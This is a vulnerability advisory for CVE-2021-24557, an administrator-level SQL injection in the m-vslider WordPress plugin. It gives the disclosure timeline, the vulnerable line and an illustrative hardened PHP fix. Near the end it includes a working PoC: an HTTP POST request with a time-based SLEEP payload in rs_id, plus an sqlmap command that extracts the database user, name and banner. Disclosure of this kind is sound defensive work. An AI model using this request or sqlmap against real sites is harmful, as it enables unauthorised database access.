Plugin Details
Plugin Name: wp-plugin : m-vslider
Affected Version : 2.1.3 (and most probably lower versions, if any)
Vulnerability : SQL Injection (authenticated)
Minimum Level of Access Required : Administrator
CVE Number : CVE-2021-24557
Identified by : Shreya Pohekar
Disclosure Timeline
- May 14, 2021 : Issue Identified and Disclosed to WPScan
- May 19, 2021 : Plugin Closed
- July 20, 2021 : CVE Assigned
- July 23, 2021 : Public Disclosure
Technical Details
The update functionality of the rslider_page admin screen takes rs_id from a POST parameter and concatenates it into an SQL UPDATE statement without any validation, sanitisation or escaping, leading to SQL injection by users holding the Administrator role.
Because the injection point is the WHERE clause of an UPDATE, the query returns no rows to the page; the PoC therefore uses a time-based blind payload (a SLEEP() sub-select) and sqlmap is driven against the same parameter.
Vulnerable Code: rslider.php#L374
374: $updatequery .= " WHERE rs_id = " . $_POST['rs_id'];
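The following is an added example illustrating the flaw and one way to fix it; it is not the plugin's own code and not the vendor's patch. The vulnerable line is the one quoted above; the table name, the function names, the nonce action and the column list are assumptions made for illustration (rs_name, rs_width and rs_height are taken from the POST body in the PoC request below).

```php
<?php
// Added example, not code from the m-vslider plugin. The table name
// ({$wpdb->prefix}rslider), the function names and the nonce action are
// assumptions made for illustration.

// Vulnerable pattern (same shape as rslider.php#L374): rs_id is read from
// $_POST and glued straight into the WHERE clause. A value such as
// "2 AND (SELECT 9727 FROM (SELECT(SLEEP(5)))KZOZ)" becomes part of the SQL,
// which is exactly what the time-based PoC below relies on.
function rslider_update_vulnerable( $wpdb, array $post ) {
    $updatequery  = "UPDATE {$wpdb->prefix}rslider SET rs_name = '" . $post['rs_name'] . "'";
    $updatequery .= " WHERE rs_id = " . $post['rs_id'];
    return $wpdb->query( $updatequery );
}

// Hardened form: the id is coerced to an integer, every value is bound through
// $wpdb->prepare() so the driver quotes and escapes it, and the request is
// tied to a capability check and a nonce so a forged form submission cannot
// reach the query at all.
function rslider_update_hardened( $wpdb, array $post ) {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    check_admin_referer( 'rslider_update' ); // nonce action name is an assumption

    // absint() reduces "2 AND (SELECT ...)" to 2; anything non-numeric becomes 0.
    $rs_id = absint( $post['rs_id'] ?? 0 );
    if ( 0 === $rs_id ) {
        wp_die( 'Invalid slider id.' );
    }

    $sql = $wpdb->prepare(
        "UPDATE {$wpdb->prefix}rslider
            SET rs_name = %s, rs_width = %d, rs_height = %d
          WHERE rs_id = %d",
        sanitize_text_field( $post['rs_name'] ?? '' ),
        absint( $post['rs_width'] ?? 0 ),
        absint( $post['rs_height'] ?? 0 ),
        $rs_id
    );
    return $wpdb->query( $sql );
}
```

The integer cast alone would already neutralise the payload shown in the PoC, but the prepared statement is what protects the remaining string columns; the capability and nonce checks matter because the update handler runs on an admin page and would otherwise be reachable through a CSRF-style forged form.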
PoC Screenshot
Exploit
POST /wp-admin/admin.php?page=rslider_page&updated=true HTTP/1.1
Host: 172.28.128.50
Content-Length: 424
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://172.28.128.50
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://172.28.128.50/wp-admin/admin.php?page=rslider_page
Accept-Language: en-US,en;q=0.9
Cookie: spf-last-metabox-tab-12-_sptp_generator=_sptp_generator_1; spf-last-metabox-tab-14-_sptp_generator=_sptp_generator_1; wordpress_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Ce8b173e02d87095d6cd04209dbfeda32a85a82d72b684e5e4db9e8da3c25c610; __eucookielaw=true; giveasap_110=5852970951c80fcaa281efebddaaf1b3; _ga=GA1.1.436418670.1617784311; wordpress_test_cookie=WP%20Cookie%20check; wp-settings-time-4=1619288085; wordpress_logged_in_232395f24f6cff47569f2739c21385d6=admin%7C1619784669%7CqTnNMQIcB6qyLJ4wbLSDz4TgZNqTVBscu1jNj8pFlfl%7Cb4cc1181f3020f37b67c5d7020c67fffbd647bfa363a2f07198baf1189be58db; wp-settings-1=editor%3Dtinymce%26libraryContent%3Dbrowse%26posts_list_mode%3Dlist; wp-settings-time-1=1619611876
Connection: close
tcOptions=process&rs_id=2%20AND%20(SELECT%209727%20FROM%20(SELECT(SLEEP(5)))KZOZ)&rs_name=asd&rs_width=250&rs_height=250&rs_animstyle=fade&rs_slices=15&rs_boxCols=8&rs_boxRows=4&rs_theme=bar&rs_type=sequence&rs_speed=1300&rs_timeout=5&rs_css=margin%3A+0px+0px+0px+0px%3Bpadding%3A+0%3Bborder%3A+none%3B&rs_img0=&rs_lnk0=&rs_cap0=&rs_img1=&rs_lnk1=&rs_cap1=&rs_img2=&rs_lnk2=&rs_cap2=&rs_img3=&rs_lnk3=&rs_cap3=&rs_img4=&rs_lnk4=&rs_cap4=&rs_totalimgs=5&save=Save+Settings
SQLMap Command
sqlmap -r m-vslider.req --dbms mysql --current-user --current-db -b -p rs_id